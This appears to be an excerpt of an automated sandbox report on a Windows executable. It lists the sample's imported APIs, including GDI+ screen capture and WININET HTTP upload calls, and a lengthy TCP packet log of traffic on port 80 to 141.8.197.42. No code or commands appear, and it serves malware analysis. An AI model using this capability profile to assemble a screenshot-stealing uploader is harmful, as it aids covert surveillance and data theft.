                                  KERNEL32.dllEnterCriticalSection, GetCurrentProcess, WriteFile, LeaveCriticalSection, SetFilePointer, InitializeCriticalSectionEx, UnmapViewOfFile, GetModuleHandleA, HeapSize, MultiByteToWideChar, GetFileInformationByHandle, CopyFileA, GetLastError, CreateFileA, FileTimeToSystemTime, LoadLibraryA, LockResource, HeapReAlloc, CloseHandle, RaiseException, FindResourceExW, LoadResource, FindResourceW, HeapAlloc, GetLocalTime, DecodePointer, HeapDestroy, GetProcAddress, CreateFileMappingA, GetFileSize, DeleteCriticalSection, GetProcessHeap, SystemTimeToFileTime, FreeLibrary, HeapFree, MapViewOfFile, GetTickCount, IsWow64Process, AreFileApisANSI, GetFullPathNameW, LockFile, InitializeCriticalSection, GetFullPathNameA, SetEndOfFile, GetTempPathW, CreateFileW, GetFileAttributesW, GetCurrentThreadId, Sleep, GetTempPathA, GetFileAttributesA, GetVersionExA, DeleteFileA, DeleteFileW, LoadLibraryW, UnlockFile, LockFileEx, GetCurrentProcessId, GetSystemTimeAsFileTime, GetSystemTime, FormatMessageA, QueryPerformanceCounter, FlushFileBuffers, SetStdHandle, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetOEMCP, GetACP, IsValidCodePage, SizeofResource, GetModuleFileNameA, WideCharToMultiByte, ReadFile, ReadConsoleW, GetTimeZoneInformation, GetFileType, GetFileSizeEx, GetConsoleMode, GetConsoleCP, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetTimeFormatW, GetDateFormatW, WriteConsoleW, GetCommandLineW, GetCommandLineA, GetStdHandle, GetModuleFileNameW, QueryPerformanceFrequency, GetModuleHandleExW, ExitProcess, VirtualQuery, VirtualProtect, VirtualAlloc, GetSystemInfo, GetCurrentDirectoryW, CreateDirectoryW, FindClose, FindFirstFileExW, FindNextFileW, GetFileAttributesExW, RemoveDirectoryW, SetFilePointerEx, SetLastError, GetModuleHandleW, CopyFileW, LocalFree, GetStringTypeW, EncodePointer, InitializeCriticalSectionAndSpinCount, CreateEventW, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, IsDebuggerPresent, OutputDebugStringW, SetEvent, ResetEvent, WaitForSingleObjectEx, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, InitializeSListHead, TerminateProcess, RtlUnwind, LoadLibraryExW
                                  USER32.dllGetDC, GetSystemMetrics, ReleaseDC, GetDesktopWindow
                                  GDI32.dllDeleteObject, GetObjectA
                                  SHLWAPI.dllPathFindExtensionW, PathFindExtensionA
                                  gdiplus.dllGdipSaveImageToFile, GdipCreateBitmapFromScan0, GdipGetImageEncodersSize, GdipDisposeImage, GdipGetImageEncoders, GdiplusShutdown, GdipCreateBitmapFromHBITMAP, GdiplusStartup
                                  WININET.dllInternetWriteFile, HttpEndRequestA, HttpSendRequestExA, InternetOpenA, HttpOpenRequestA, InternetConnectA, InternetCloseHandle

                                  Network Behavior

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Nov 7, 2022 19:25:55.763398886 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:55.824225903 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:55.824419022 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:55.825337887 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:55.825608969 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:55.826206923 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:55.885982990 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:55.886034966 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:55.886363029 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:55.886686087 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:55.886805058 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:55.886825085 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:55.886913061 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:55.886997938 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:55.887093067 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:55.947283983 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:55.947372913 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:55.947407007 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:55.947513103 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:55.947513103 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:55.947601080 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:55.947722912 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:55.947747946 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:55.947844982 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:55.947886944 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:55.947988987 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:55.948020935 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:55.948102951 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:55.948133945 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:55.948201895 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.008400917 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.008533955 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.008584023 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.008586884 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.008605003 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.008622885 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.008713961 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.008716106 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.008769035 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.008779049 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.008788109 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.008847952 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.008882046 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.009027004 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.009104013 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.009145021 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.009215117 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.009316921 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.009402990 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.009449005 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.009522915 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.009596109 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.009665012 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.009778023 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.009799004 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.009875059 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.009964943 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.010046959 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.069283009 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.069474936 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.069525957 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.069559097 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.069638014 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.069669962 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.069677114 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.069741011 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.069750071 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.069906950 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.070033073 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.070058107 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.070074081 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.070089102 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.070110083 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.070154905 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.070226908 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.070249081 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.070307016 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.070307970 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.070389986 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.070445061 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.070574999 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.070633888 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.070899010 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.070923090 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.070943117 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.070965052 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.070975065 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.071032047 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.071042061 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.071050882 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.071099043 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.071105957 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.071160078 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.130275965 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.130319118 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.130341053 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.130428076 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.130481005 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.130549908 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.130667925 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.130692005 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.130709887 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.130737066 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.130740881 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.130758047 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.130763054 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.130774975 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.130781889 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.130805969 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.130827904 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.130844116 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.130894899 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.130920887 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.130980015 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.131000042 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.131047010 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.131057978 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.131069899 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.131088972 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.131108046 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.131145954 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.131274939 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.131294966 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.131333113 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.131361961 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.131486893 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.131570101 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.131596088 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.131613970 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.131652117 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.131675005 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.131872892 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.131894112 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.131917000 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.131934881 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.131948948 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.131953955 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.131973982 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.131997108 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.132014990 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.191430092 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.191468000 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.191484928 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.191498995 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.191617966 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.191617966 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.191682100 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.191786051 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.191804886 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.191871881 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.191871881 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.192024946 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.192042112 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.192126989 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.192128897 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.192203045 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.192559958 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.192584038 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.192599058 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.192615986 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.192667961 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.192702055 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.192702055 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.192715883 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.192779064 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.192799091 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.192852020 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.193049908 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.193084955 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.193100929 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.193131924 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.193162918 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.233269930 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.233361959 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.252511978 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.252638102 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.252757072 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.252809048 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.252839088 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.252851963 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.252872944 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.252896070 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.252902031 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.252935886 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.252948046 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.252985954 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.253632069 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.253726959 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.253740072 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.253789902 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.253822088 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.253854036 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.253886938 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.253906012 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.253917933 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.253938913 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.253938913 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.253972054 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.253999949 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.254045963 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.294157028 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.294240952 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.313643932 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.313749075 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.313759089 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.313815117 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.313911915 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.313962936 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.314100981 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.314145088 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.314217091 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.314265966 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.314377069 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.314433098 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.315613985 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.315644979 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.315668106 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.315687895 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.315707922 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.315728903 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.315771103 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.315771103 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.315808058 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.315823078 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.315830946 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.315871954 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.316140890 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.316162109 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.316210032 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.316210032 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.355178118 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.355289936 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.374716997 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.374788046 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.374834061 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.374910116 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.374914885 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.374914885 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.374964952 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.374984026 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.374984026 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.375010014 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.375022888 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.375061035 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.376746893 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.376773119 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.376790047 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.376810074 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.376830101 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.376847029 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.376849890 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.376899958 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.376899958 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.376935005 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.376991987 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.377043009 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.377235889 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.377281904 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.377289057 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.377326965 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.377336979 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.377379894 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.417315960 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.417572021 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.435973883 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.436119080 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.436199903 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.436240911 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.436291933 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.436325073 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.437496901 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.437527895 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.437570095 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.437613964 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.437658072 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.437709093 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.437951088 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.438018084 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.438075066 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.438137054 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.438172102 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.438195944 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.438225031 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.438261032 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.438399076 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.438458920 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.479640007 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.479780912 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.497664928 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.497706890 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.497729063 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.497947931 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.498018026 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.498099089 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.498120070 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.498195887 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.498379946 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.498466015 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.498469114 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.498534918 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.498625040 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.498701096 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.498702049 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.498769045 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.499094009 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.499156952 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.499226093 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.499264956 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.499392986 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.499459028 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.539158106 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.539262056 CET4968580192.168.2.4141.8.197.42
